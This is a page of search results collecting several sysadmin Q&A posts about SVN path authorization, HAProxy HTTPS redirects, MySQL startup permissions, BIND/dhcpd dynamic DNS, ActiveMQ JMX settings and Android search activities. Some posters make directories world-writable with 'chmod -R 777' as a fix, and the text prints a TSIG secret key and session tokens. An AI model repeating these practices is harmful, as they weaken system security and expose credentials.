Search Results

Search found 1981 results on 80 pages for 'trick jarrett'.


  • Using AuthzSVNAccessFile for controlling SVN Access produces HTTP 400 Bad Request

    - by meeper
    I have a new repository on an existing Subversion server that requires path-based authorization within the repository. I found that the AuthzSVNAccessFile directive in Apache is directly responsible for allowing this functionality. After fixing several other problems, such as AuthzSVNAccessFile preventing SVNListParentPath from operating properly, I am left with one single problem: I can check out, I can update, I can commit, BUT I cannot execute an SVN COPY for performing branch/tag operations. The moment I comment out the AuthzSVNAccessFile line in the Apache config, everything works as expected except, obviously, the path authorizations.

    Versions:

        Server OS: Debian 6.0.7 (Squeeze)
        Apache 2.2.16-6+squeeze11
        Server Subversion 1.6.12dfsg-7
        Clients are running Windows. Clients tried:
            TortoiseSVN 1.8.2 Build 24708 64-bit
            SVN CLI client 1.8.3 (r1516576)

    Authentication is performed via AD against a Windows 2003 domain and appears to be operating normally. I have stripped out all other configurations and repository setups to produce this single configuration that reproduces the problem.

    Apache configuration:

        <VirtualHost *:443>
            ServerName svn-test.company.com
            ServerAlias /svn-test
            ServerAdmin [email protected]
            SSLEngine On
            SSLCertificateFile /etc/apache2/apache.pem
            ErrorLog /var/log/apache2/svn-test_error.log
            LogLevel warn
            CustomLog /var/log/apache2/svn-test_access.log combined
            ServerSignature On

            # Repository Access to all Repositories
            <Location "/">
                DAV svn
                SVNParentPath /var/svn
                SVNListParentPath on
                AuthBasicProvider ldap
                AuthType Basic
                AuthzLDAPAuthoritative Off
                AuthName "Subversion Test Repository System"
                AuthLDAPURL "ldap://adserver.company.com:389/DC=corp,DC=company,DC=com?sAMAccountName?sub?(objectClass=*)" NONE
                AuthLDAPBindDN "CN=service_account,OU=ServiceIDs,OU=corp,OU=Delegated,DC=na,DC=corp,DC=company,DC=com"
                AuthLDAPBindPassword service_account_password
                Require valid-user
                SSLRequireSSL
            </Location>

            # <LocationMatch /.+> is a really dirty trick to make listing of repositories work
            # http://d.hatena.ne.jp/shimonoakio/20080130/1201686016
            <LocationMatch /.+>
                AuthzSVNAccessFile /etc/apache2/svn_path_auth
            </LocationMatch>
        </VirtualHost>

    SVN access file:

        [/]
        * = rw

    The repository used (AuthTestBasic) consists of the following directory structure and contains no externals (this is a literal listing, not an example):

        /
        /branches/
        /tags/
        /trunk/
        /trunk/somefile.txt

    Tortoise produces the following error during a tag operation in its tag result window:

        Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request)

    The svn.exe CLI client produces the following error:

        C:\Users\e20epkt>svn copy https://servername/authtestbasic/trunk https://servername/authtestbasic/tags/tag1 -m "svn cli client"
        svn: E175002: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request)

    The Apache error log has nothing in it; however, the Apache access log has the following in it (IP addresses and usernames changed, obviously):

        10.1.2.100 - - [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 401 2595 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 996 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 884 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/trunk HTTP/1.1" 207 692 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/0/trunk HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 200 674 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 207 548 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags/tag1 HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "MKACTIVITY /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags HTTP/1.1" 207 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/vcc/default HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPPATCH /authtestbasic/!svn/wbl/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e/2 HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/ver/1/tags HTTP/1.1" 201 724 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "COPY /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 400 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"
        10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "DELETE /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 204 1956 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708"

    You'll see that the second-to-last line contains the COPY command with the HTTP 400 response; however, there doesn't appear to be any indication as to why. Please note that, while yes, this is a test repository on a test server, I am experiencing this same issue in this test setup, where I have eliminated all other possible causes (mixed repository configurations, externals, etc.). I have also confirmed that all files for the repository (/var/svn/authtestbasic) are owned by the Apache user www-data.
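
    One configuration worth testing (an assumption about the interaction, not a confirmed fix): COPY has to authorize both the request URL and the Destination header, so the <LocationMatch /.+> indirection may be what produces the 400. Attaching the access file directly in the block that defines DAV svn keeps source and destination under one location:

        <Location "/">
            DAV svn
            SVNParentPath /var/svn
            SVNListParentPath on
            # hypothetical placement: path authz in the same location as DAV svn
            AuthzSVNAccessFile /etc/apache2/svn_path_auth
            # ... auth directives as above ...
        </Location>

    If repository listing then breaks again, that at least narrows the 400 down to the LocationMatch trick rather than to the access file itself.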


  • Getting HAProxy to redirect HTTP to HTTPS in the user's browser session

    - by Jon
    We are currently using an Internet cloud provider to host our SaaS platform. The platform consists of:

        Firewall -> Cloud Provider SLB -> Apache Web Server -> HAPROXY SLB -> Liferay Platform

    We have had to use HAProxy because of an issue with the cloud provider's SLB that meant we were unable to use it for load balancing the Liferay platform applications. I have implemented HAProxy in our secure tier, and it seems to do the trick of load balancing the requests quite adequately. However, during testing we encountered a functional issue whereby selecting a sub-menu from the web portal resulted in the application hanging. Using an HTTP analyser, we saw that the request being passed back to the user's browser was plain HTTP. From discussing this with the software vendor, it transpires that the Liferay application has some hard-coded http links, and that other customers have worked around this by using physical NLBs such as F5 and redirecting the HTTP traffic to HTTPS.

    The entry in the HAProxy log reads:

        haproxy[2717]: <Apache Web Agent>:37957 [11/Apr/2013:08:07:00.128] http-uapi uapi/<ServerName> 0/0/0/9/10 200 4912 - - ---- 4/2/1/2/0 0/0 "GET /servicedesk/controller?docommand=renderradform&!key=esd_sfb001_frm_feedback_forms_list&isportalintegratedmode=true&USR=joe.bloggs%40gmail.com&_dc=1365667773097&redirecturl=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_SFB001_FRM_FEEDBACK_FORMS_LIST%26isportalintegratedmode%3Dtrue&sso_token=ALiYv2UqzLsAhSw1ZchRDlCHlq44Bhj9&ONERROR=%2Fweb%2Fjsp%2Fapps%2Fportal-integration-error.jsp&itype=login&slicetoken=NW51O%242aRo%2C_Zz%2476P_9DTtnFmz6%28bhk&AUTOFORWARDURL=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_SFB001_FRM_FEEDBACK_FORMS_LIST%26isportalintegratedmode%3Dtrue&LOGINPAGE=https%3A%2F%2F<FQDN of Web Portal>%2Fweb%2F4732cf01-82c3-4bc5-b6c9-552253e672cf%2Fworkflow-tools&appid=1&!uid=1&!redownloadToken=7.0.3.1.1363611301.0&userlocale=en_US&!datechanged=2012-05-18%2015:05:31.38 HTTP/1.1"

    The corresponding HTTP browser entry shows:

        http://<FQDN of ServiceDesk>/servicedesk/controller?docommand=renderradform&!key=esd_org019_frm_contact_list&isportalintegratedmode=true&USR=joe.bloggs%40gmail.com&_dc=1365665987887&redirecturl=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_ORG019_FRM_CONTACT_LIST%26isportalintegratedmode%3Dtrue&sso_token=3NxsXYORMPp32SwL8ftVUCMH2QdWLH82&ONERROR=%2Fweb%2Fjsp%2Fapps%2Fportal-integration-error.jsp&itype=login&slicetoken=NW51O%242aRo%2C_Zz%2476P_9DTtnFmz6%28bhk&AUTOFORWARDURL=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_ORG019_FRM_CONTACT_LIST%26isportalintegratedmode%3Dtrue&LOGINPAGE=https%3A%2F%2F<FQDN of Web Portal>%2Fweb%2F4732cf01-82c3-4bc5-b6c9-552253e672cf%2Fapplication-setup&appid=1&!uid=1&!redownloadToken=7.0.3.1.1363611301.0&userlocale=en_US&!datechanged=2012-10-26%2019:00:25.08

    From reading through the forums and other sites, it looks like we should be able to use HAProxy to redirect the traffic to HTTPS, but try as I might I can't get it to work. This is our HAProxy configuration:

        global
            log 127.0.0.1 local2
            chroot /var/lib/haproxy
            pidfile /var/run/haproxy.pid
            maxconn 4000
            user haproxy
            group haproxy
            daemon
            stats socket /var/lib/haproxy/stats

        defaults
            mode http
            log global
            option httplog
            option dontlognull
            option http-server-close
            option forwardfor except 127.0.0.0/8
            option redispatch
            retries 3
            timeout http-request 10s
            timeout queue 1m
            timeout connect 10s
            timeout client 1m
            timeout server 1m
            timeout http-keep-alive 10s
            timeout check 10s
            maxconn 3000

        frontend http-openfire
            bind *:7070
            default_backend openfire

        backend openfire
            balance roundrobin
            server <serverName> <IPv4 Address>:7070 check
            server <serverName> <IPv4 Address>:7070 check

        frontend http-uapi
            bind *:7080
            default_backend uapi

        backend uapi
            balance roundrobin
            server <serverName> <IPv4 Address>:7080 check
            server <serverName> <IPv4 Address>:7080 check

        frontend http-sec
            bind *:8080
            default_backend sec

        backend sec
            balance roundrobin
            server <serverName> <IPv4 Address>:8080 check
            server <serverName> <IPv4 Address>:8080 check

        frontend http-wall
            bind *:9080
            default_backend wall

        backend wall
            balance roundrobin
            server <serverName> <IPv4 Address>:9080 check
            server <serverName> <IPv4 Address>:9080 check

        frontend http-xmpp
            bind *:9090
            default_backend xmpp

        backend xmpp
            balance roundrobin
            server <serverName> <IPv4 Address>:9090 check
            server <serverName> <IPv4 Address>:9090 check

        frontend http-aim
            bind *:10080
            default_backend aim

        backend aim
            balance roundrobin
            server <serverName> <IPv4 Address>:10080 check
            server <serverName> <IPv4 Address>:10080 check

        frontend http-servicedesk
            bind *:8081
            default_backend servicedesk

        backend servicedesk
            balance roundrobin
            server <serverName> <IPv4 Address>:8081 check
            server <serverName> <IPv4 Address>:8081 check

        listen stats :1936
            mode http
            stats enable
            stats hide-version
            stats realm Haproxy\ Statistics
            stats uri /
            stats auth haproxy:<Password>

    I have tried following the articles posted at http://stackoverflow.com/questions/13227544/haproxy-redirecting-http-to-https-ssl and http://parsnips.net/haproxy-http-to-https-redirect/, but that hasn't made any difference. Am I on the right track with this, or are we trying to achieve the impossible? I'm hoping I'm just being an idiot and one of you good people can point me in the right direction.
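
    For reference, a minimal sketch of the redirect usually applied in this situation (assumptions: SSL terminates upstream at the cloud SLB/Apache, and that tier can be made to set an X-Forwarded-Proto header; on HAProxy 1.5+ that itself terminates TLS, the shorter form is "redirect scheme https code 301 if !{ ssl_fc }"):

        frontend http-uapi
            bind *:7080
            # hypothetical: the TLS-terminating tier marks forwarded plain-HTTP requests
            acl is_http hdr(X-Forwarded-Proto) -i http
            redirect prefix https://<FQDN of Web Portal> code 301 if is_http
            default_backend uapi

    Note that this only redirects the browser once it follows a hard-coded http link; it does not rewrite the links inside the pages themselves.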


  • Launching mysql server: same permissions for root and for user

    - by toinbis
    Hi folks, I have been directed here from Stack Overflow; I am reposting the question and adding my.cnf at the end of the post.

    So far in my 10+ years of experience with Linux, all the permission problems I've ever encountered have been successfully solved with chmod -R 777 /path/where/the/problem/has/occured (every lie has a grain of truth in it :). This time the trick doesn't work, so I'm turning to you for help.

    I'm compiling a MySQL server from scratch with zc.buildout (www.buildout.org). I launch it by executing /home/toinbis/.../parts/mysql/bin/mysqld_safe, and this works. The thing is that I'll be launching this from within a supervisor (supervisord.org) script, and when used on the deployment server it'll need to be launched with root permissions (so that the nginx server, launched with the same script, has access to port 80). The problem is that sudo /home/toinbis/.../parts/mysql/bin/mysqld_safe fails, generating the error posted below in the MySQL error log (Apache and nginx work as expected).

    http://lists.mysql.com/mysql/216045 suggests that "there are two errors: A missing table and a file system that mysqld doesn't have access to". The MySQL datadir and all the MySQL server binary files have 777 permissions; the table mysql.plugin does exist and has 777 permissions (so why "Can't open the mysql.plugin table"?); "sudo touch mysql_datadir/tmp/file" does create a file (so why "Can't create/write to file /home/toinbis/.../runtime/mysql_datadir/tmp/ib4e9Huz"?). Running chgrp -R mysql mysql_datadir and adding the "root, toinbis, mysql" users to the mysql group (cat /etc/group | grep mysql outputs mysql:x:124:root,toinbis,mysql) has no effect: when I launch it as a casual user, it starts; when as root, it fails. Does the MySQL server, even when started as root, try to operate as another user, let's say 'mysql'? But even in that case, adding the mysql user to the mysql group and making all the mysql_datadir files belong to the mysql group should make things work smoothly.

    I do know that it might be a better idea simply to launch nginx as root and MySQL as just a user, but this error irritated me enough to devote the energy not only to "make things work", but to make things work exactly as I wanted initially, so as to have a proof of concept that it's possible.

    This is the generated error:

        091213 20:02:55 mysqld_safe Starting mysqld daemon with databases from /home/toinbis/.../runtime/mysql_datadir
        /home/toinbis/.../parts/mysql/libexec/mysqld: Table 'plugin' is read only
        091213 20:02:55 [ERROR] Can't open the mysql.plugin table. Please run mysql_upgrade to create it.
        /home/toinbis/.../parts/mysql/libexec/mysqld: Can't create/write to file '/home/toinbis/.../runtime/mysql_datadir/tmp/ib4e9Huz' (Errcode: 13)
        091213 20:02:55 InnoDB: Error: unable to create temporary file; errno: 13
        091213 20:02:55 [ERROR] Plugin 'InnoDB' init function returned error.
        091213 20:02:55 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
        091213 20:02:55 [ERROR] Can't start server : Bind on unix socket: Permission denied
        091213 20:02:55 [ERROR] Do you already have another mysqld server running on socket: /home/toinbis/.../runtime/var/pids/mysql.sock ?
        091213 20:02:55 [ERROR] Aborting
        091213 20:02:55 [Note] /home/toinbis/.../parts/mysql/libexec/mysqld: Shutdown complete
        091213 20:02:55 mysqld_safe mysqld from pid file /home/toinbis/.../runtime/var/pids/mysql.pid ended

    My my.cnf (the basedir and datadir, including tmpdir, have chmod -R 777 permissions):

        [client]
        socket = /home/toinbis/.../runtime/var/pids/mysql.sock
        port   = 8002

        [mysqld_safe]
        socket = /home/toinbis/.../runtime/var/pids/mysql.sock
        nice   = 0

        [mysqld]
        #
        # * Basic Settings
        #
        socket       = /home/toinbis/.../runtime/var/pids/mysql.sock
        port         = 8002
        pid-file     = /home/toinbis/.../runtime/var/pids/mysql.pid
        basedir      = /home/toinbis/.../parts/mysql
        datadir      = /home/toinbis/.../runtime/mysql_datadir
        tmpdir       = /home/toinbis/.../runtime/mysql_datadir/tmp
        skip-external-locking
        bind-address = 127.0.0.1
        log-error    = /home/toinbis/.../runtime/logs/mysql_errorlog
        #
        # * Fine Tuning
        #
        key_buffer         = 16M
        max_allowed_packet = 32M
        thread_stack       = 128K
        thread_cache_size  = 8
        myisam-recover     = BACKUP
        #max_connections    = 100
        #table_cache        = 64
        #thread_concurrency = 10
        #
        # * Query Cache Configuration
        #
        query_cache_limit = 1M
        query_cache_size  = 16M
        #
        # * Logging and Replication
        #
        # Both locations get rotated by the cronjob.
        # Be aware that this log type is a performance killer.
        #log = /home/toinbis/.../runtime/logs/mysql_logs/mysql.log
        #
        # Error logging goes to syslog. This is a Debian improvement :)
        #
        # Here you can see queries with especially long duration
        #log_slow_queries = /home/toinbis/.../runtime/logs/mysql_logs/mysql-slow.log
        #long_query_time  = 2
        #log-queries-not-using-indexes
        #
        # The following can be used as easy-to-replay backup logs or for replication.
        #server-id        = 1
        #log_bin          = /home/toinbis/.../runtime/mysql_datadir/mysql-bin.log
        #binlog_format    = ROW
        #read_only        = 0
        #expire_logs_days = 10
        #max_binlog_size  = 100M
        #sync_binlog      = 1
        #binlog_do_db     = include_database_name
        #binlog_ignore_db = include_database_name
        #
        # * InnoDB
        #
        innodb_data_file_path          = ibdata1:10M:autoextend
        innodb_buffer_pool_size        = 64M
        innodb_log_file_size           = 16M
        innodb_log_buffer_size         = 8M
        innodb_flush_log_at_trx_commit = 1
        innodb_file_per_table
        innodb_locks_unsafe_for_binlog = 1

        [mysqldump]
        quick
        quote-names
        max_allowed_packet = 32M

        [mysql]
        #no-auto-rehash # faster start of mysql but no tab completion

        [isamchk]
        key_buffer = 16M

    Any ideas much appreciated! Regards, to

    P.S. Sorry for the messy hyperlinks; it's my first post and the anti-spam feature of SF doesn't allow me to post them properly :)
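
    One thing worth checking (an assumption based on how stock mysqld behaves, not a verified diagnosis of this particular build): mysqld does not drop root privileges unless it is told which account to run as, so the sudo launch really runs the server as root, while the casual launch runs it as toinbis. Pinning the account makes both launch paths equivalent:

        # on the command line:
        sudo /home/toinbis/.../parts/mysql/bin/mysqld_safe --user=toinbis &

        # or permanently, in my.cnf under [mysqld]:
        user = toinbis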


  • DDNS Not Creating Journal (Dhcpd and Named)

    - by user130094
    * EDIT 1 *

    After monkeying with additional debug logging, I see some log entries of interest:

        27-Jul-2012 23:45:26.537 general: error: zone example.lan/IN/internal: journal rollforward failed: no more
        27-Jul-2012 23:45:26.537 general: error: zone example.lan/IN/internal: not loaded due to errors.

    ^^^ If I can remedy the above messages I think I'll be good to go ^^^

    * EDIT 2 *

    Grasping at straws, I touched a forward and a reverse zone journal file and restarted named. Boom! Works. Despite documentation stating the files are created automatically, and despite what I have seen before... I don't know why, but that did the trick. I also re-checked perms on the dir the files live in; as certain as I was, they were correct, with named having rw.

    Versions:

        CentOS 6 (final)
        dhcpd 4.1.1-P1
        named BIND 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6

    Basic DHCP and DNS functionality are in place on 192.168.111.2. Clients are assigned addresses as intended and can resolve local DNS names as well as Internet names. My problem is that named's zone journal files are not created.

        chroot: /var/named/chroot

    I tried placing the zone files in various directories (/var/named/data, /var/named, /var/named/dynamic; no matter which directory, with named owning it and wide-open perms, I now get nowhere). Along the way I, at one point, got a permission-denied error when named tried to create the journal. I resolved that issue with:

        chown --recursive named:named /var/named
        chmod --recursive 777 /var/named

    The journal was then created, and here's where things fell apart. I attempted to tame the permissions to something more sane and broke it. Once they were changed and named restarted, it threw an error indicating the journal was out of sync (or something to that effect)... which didn't matter, since this is a new setup, so I deleted it, and now it is not recreated. Now, though, I see no errors in /var/log/messages, my chrooted /var/log/named.log, or the chrooted /var/log/named.debug. I increased the debug level with 'rndc trace'; no love. Increased trace to 10, still nothing. SELinux is disabled:

        [root@server temp]# sestatus
        SELinux status:                 disabled

    dhcpd.conf:

        allow client-updates;
        ddns-update-style interim;

        subnet 192.168.111.0 netmask 255.255.255.224 {
            ...
            key dhcpudpate {
                algorithm hmac-md5;
                secret LDJMdPdEZED+/nN/AGO9ZA==;
            }
            zone example.lan. {
                primary 192.168.111.2;
                key dhcpudpate;
            }
        }

    named.conf:

        key dhcpudpate {
            algorithm hmac-md5;
            secret "LDJMdPdEZED+/nN/AGO9ZA==";
        };

        zone "example.lan" {
            type master;
            file "/var/named/dynamic/example.lan.db";
            allow-transfer { none; };
            allow-update { key dhcpudpate; };
            notify false;
            check-names ignore;
        };

    The following shows the /var/log/named.log output of named starting up; no errors:

        27-Jul-2012 21:33:39.349 general: info: zone 111.168.192.in-addr.arpa/IN/internal: loaded serial 2012072601
        27-Jul-2012 21:33:39.349 general: info: zone example.lan/IN/internal: loaded serial 2012072501
        27-Jul-2012 21:33:39.350 general: info: zone example2.lan/IN/internal: loaded serial 2012072501
        27-Jul-2012 21:33:39.350 general: info: zone example3.lan/IN/internal: loaded serial 2012072601
        27-Jul-2012 21:33:39.350 general: info: zone example4.lan/IN/internal: loaded serial 2012072501
        27-Jul-2012 21:33:39.351 general: info: zone example5.lan/IN/internal: loaded serial 2012072501
        27-Jul-2012 21:33:39.351 general: info: managed-keys-zone ./IN/internal: loaded serial 0
        27-Jul-2012 21:33:39.351 general: info: zone example.lan/IN/external: loaded serial 2012072501
        27-Jul-2012 21:33:39.352 general: info: zone example1.lan/IN/external: loaded serial 2012072501
        27-Jul-2012 21:33:39.352 general: info: zone example2.lan/IN/external: loaded serial 2012072501
        27-Jul-2012 21:33:39.352 general: info: zone example3.lan/IN/external: loaded serial 2012072501
        27-Jul-2012 21:33:39.353 general: info: managed-keys-zone ./IN/external: loaded serial 0
        27-Jul-2012 21:33:39.353 general: notice: running
        27-Jul-2012 21:34:03.825 general: info: received control channel command 'trace 10'
        27-Jul-2012 21:34:03.825 general: info: debug level is now 10

    ...and /var/log/messages for a named start:

        Jul 27 23:02:04 server named[9124]: ----------------------------------------------------
        Jul 27 23:02:04 server named[9124]: BIND 9 is maintained by Internet Systems Consortium,
        Jul 27 23:02:04 server named[9124]: Inc. (ISC), a non-profit 501(c)(3) public-benefit
        Jul 27 23:02:04 server named[9124]: corporation. Support and training for BIND 9 are
        Jul 27 23:02:04 server named[9124]: available at https://www.isc.org/support
        Jul 27 23:02:04 server named[9124]: ----------------------------------------------------
        Jul 27 23:02:04 server named[9124]: adjusted limit on open files from 4096 to 1048576
        Jul 27 23:02:04 server named[9124]: found 2 CPUs, using 2 worker threads
        Jul 27 23:02:04 server named[9124]: using up to 4096 sockets
        Jul 27 23:02:04 server named[9124]: loading configuration from '/etc/named.conf'
        Jul 27 23:02:04 server named[9124]: using default UDP/IPv4 port range: [1024, 65535]
        Jul 27 23:02:04 server named[9124]: using default UDP/IPv6 port range: [1024, 65535]
        Jul 27 23:02:04 server named[9124]: listening on IPv4 interface eth0, 192.168.111.2#53
        Jul 27 23:02:04 server named[9124]: generating session key for dynamic DNS
        Jul 27 23:02:04 server named[9124]: sizing zone task pool based on 12 zones
        Jul 27 23:02:04 server named[9124]: set up managed keys zone for view internal, file 'dynamic/3bed2cb3a3acf7b6a8ef408420cc682d5520e26976d354254f528c965612054f.mkeys'
        Jul 27 23:02:04 server named[9124]: set up managed keys zone for view external, file 'dynamic/3c4623849a49a53911c4a3e48d8cead8a1858960bccdea7a1b978d73ec2f06d7.mkeys'
        Jul 27 23:02:04 server named[9124]: command channel listening on 127.0.0.1#953

    What can I do to troubleshoot this further? It almost seems as though dhcpd is not triggering the update. Maybe I should troubleshoot there and, if so, how? Many thanks.
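
    For anyone landing here with the same "journal rollforward failed" error, a minimal recovery sequence (a sketch; the journal path assumes the chrooted layout described above) is:

        # suspend dynamic updates for the zone, discard the stale journal, resume
        rndc freeze example.lan
        rm -f /var/named/chroot/var/named/dynamic/example.lan.db.jnl
        rndc thaw example.lan

    rndc freeze also syncs pending journal changes into the zone file first, so nothing is lost when the .jnl is removed.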


  • HOWTO: disable jmx in activemq network of brokers (spring, xbean)

    - by subes
    Since I've struggled a lot with this problem, I am posting my solution. Disabling JMX in an ActiveMQ network of brokers removes race conditions around the registration of the JMX connector. When starting multiple ActiveMQ servers on the same machine:

        Failed to start jmx connector: Cannot bind to URL [rmi://localhost:1099/jmxrmi]: javax.naming.NameAlreadyBoundException: jmxrmi [Root exception is java.rmi.AlreadyBoundException: jmxrmi]

    Another problem is that even if you don't cause a race condition, this exception can still occur, even when starting one broker after another while waiting for them to initialize properly in between. If one process is run by root as the first instance and the other by a normal user, the user process somehow tries to register its own JMX connector even though there already is one. Or another exception, which happens when the broker that successfully registered the JMX connector goes down:

        Failed to start jmx connector: Cannot bind to URL [rmi://localhost:1099/jmxrmi]: javax.naming.ServiceUnavailableException [Root exception is java.rmi.ConnectException: Connection refused to host: localhost; nested exception is: java.net.ConnectException: Connection refused]

    These exceptions cause the network of brokers to stop working, or to not work at all. The trick to disabling JMX is that JMX has to be disabled in the connection factory as well. The documentation at http://activemq.apache.org/jmx.html does not say explicitly that this is needed, so I had to struggle for two days until I found the solution:

        <beans xmlns="http://www.springframework.org/schema/beans"
               xmlns:amq="http://activemq.apache.org/schema/core"
               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd
                                   http://activemq.apache.org/schema/core http://activemq.apache.org/schema/core/activemq-core-5.3.1.xsd">

            <!-- Spring JMS template -->
            <bean id="jmsTemplate" class="org.springframework.jms.core.JmsTemplate">
                <constructor-arg ref="connectionFactory" />
            </bean>

            <!-- Caching, so that the JMS template is usable at all, performance-wise -->
            <bean id="connectionFactory" class="org.springframework.jms.connection.CachingConnectionFactory">
                <constructor-arg ref="amqConnectionFactory" />
                <property name="exceptionListener" ref="jmsExceptionListener" />
                <property name="sessionCacheSize" value="1" />
            </bean>

            <!-- Each client connects to its own broker; the brokers are networked with one another.
                 Only if JMX is disabled here as well does it stay disabled... -->
            <amq:connectionFactory id="amqConnectionFactory" brokerURL="vm://broker:default?useJmx=false" />

            <!-- Brokers pick their own ports and are connected to one another, forming a grid.
                 Somewhat slower, but more failure-tolerant.
                 See http://activemq.apache.org/networks-of-brokers.html -->
            <amq:broker useJmx="false" persistent="false">
                <!-- Needed to disable JMX for good -->
                <amq:managementContext>
                    <amq:managementContext connectorHost="localhost" createConnector="false" />
                </amq:managementContext>
                <!-- Now the normal network-of-brokers configuration -->
                <amq:networkConnectors>
                    <amq:networkConnector networkTTL="1" duplex="true" dynamicOnly="true" uri="multicast://default" />
                </amq:networkConnectors>
                <amq:persistenceAdapter>
                    <amq:memoryPersistenceAdapter />
                </amq:persistenceAdapter>
                <amq:transportConnectors>
                    <amq:transportConnector uri="tcp://localhost:0" discoveryUri="multicast://default" />
                </amq:transportConnectors>
            </amq:broker>
        </beans>

    With this, there is no need to specify -Dcom.sun.management.jmxremote=false for the JVM, which somehow also didn't work for me, because the connection factory started the JMX connector anyway.
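
    For anyone wiring the broker in plain Java instead of XBean, a sketch of the equivalent settings (standard BrokerService API; the connector URI is illustrative):

        import org.apache.activemq.broker.BrokerService;

        public class NoJmxBroker {
            public static void main(String[] args) throws Exception {
                BrokerService broker = new BrokerService();
                broker.setUseJmx(false);                                  // same as useJmx="false" in XBean
                broker.setPersistent(false);
                broker.getManagementContext().setCreateConnector(false);  // never open an RMI connector
                broker.addConnector("tcp://localhost:0");                 // pick a free port
                broker.start();
                broker.waitUntilStopped();
            }
        }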


  • Android 1.5 - 2.1 Search Activity affects Parent Lifecycle

    - by pacoder
    Behavior seems consistent in Android 1.5 to 2.1.

    The short version: it appears that when my (Android search facility) search activity is fired from the Android QSR due to either a suggestion or a search, UNLESS my search activity in turn fires off a VISIBLE activity that is not the parent of the search, the search parent's lifecycle changes. It will NOT fire onDestroy until I launch a visible activity from it. If I do, onDestroy fires fine. I need a way to get around this behavior.

    The long version: we have implemented a SearchSuggestion provider and a Search activity in our application. The one thing about it that is very odd is that if the SearchManager passes control to our custom Search activity, AND that activity does not create a visible activity, the activity which parented the search does not get destroyed (onDestroy doesn't run), and it will not until we call a visible activity from the parent activity. As long as our Search activity fires off another activity that gets focus, the parent activity will fire onDestroy when I back out of it. The trick is that that activity must have a visual component. I tried to fake it out with a 'pass-through' activity, so that my Search activity could fire off another Intent and bail out, but that didn't work either. I have tried setting our SearchActivity to launch singleTop, I also tried setting its noHistory attribute to true, tried setResult(RESULT_OK) in SearchActivity prior to finish(), and a bunch of other things; nothing is working.

